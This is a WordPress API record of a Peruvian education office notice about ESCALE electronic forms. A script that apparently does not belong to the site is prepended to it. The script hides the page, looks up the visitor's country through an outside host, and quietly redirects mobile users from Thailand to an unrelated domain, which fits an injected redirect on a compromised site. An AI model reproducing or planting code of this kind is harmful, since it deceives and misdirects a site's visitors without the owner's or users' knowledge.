<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":4433,"date":"2024-02-29T14:31:34","date_gmt":"2024-02-29T19:31:34","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=4433"},"modified":"2024-02-29T14:31:34","modified_gmt":"2024-02-29T19:31:34","slug":"comunicado-n-o-0064-2024-escale","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-n-o-0064-2024-escale\/","title":{"rendered":"COMUNICADO N.\u00ba 0064 \u2013 2024 \u2013 ESCALE"},"content":{"rendered":"\n<p>Link :\u00a0 <a href=\"https:\/\/escale.minedu.gob.pe\/cedulas-electronicasx\">https:\/\/escale.minedu.gob.pe\/cedulas-electronicasx<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"724\" height=\"1024\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/02\/COMUNICADO-2024-ESCALE-1-724x1024.png\" alt=\"\" class=\"wp-image-4435\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/02\/COMUNICADO-2024-ESCALE-1-724x1024.png 724w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/02\/COMUNICADO-2024-ESCALE-1-212x300.png 212w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/02\/COMUNICADO-2024-ESCALE-1-768x1086.png 768w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/02\/COMUNICADO-2024-ESCALE-1-1086x1536.png 1086w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2024\/02\/COMUNICADO-2024-ESCALE-1.png 1122w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Link :\u00a0 https:\/\/escale.minedu.gob.pe\/cedulas-electronicasx<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-4433","post","type-post","status-publish","format-standard","hentry","category-rotacion-personal"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/4433","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=4433"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/4433\/revisions"}],"predecessor-version":[{"id":4436,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/4433\/revisions\/4436"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=4433"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=4433"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=4433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}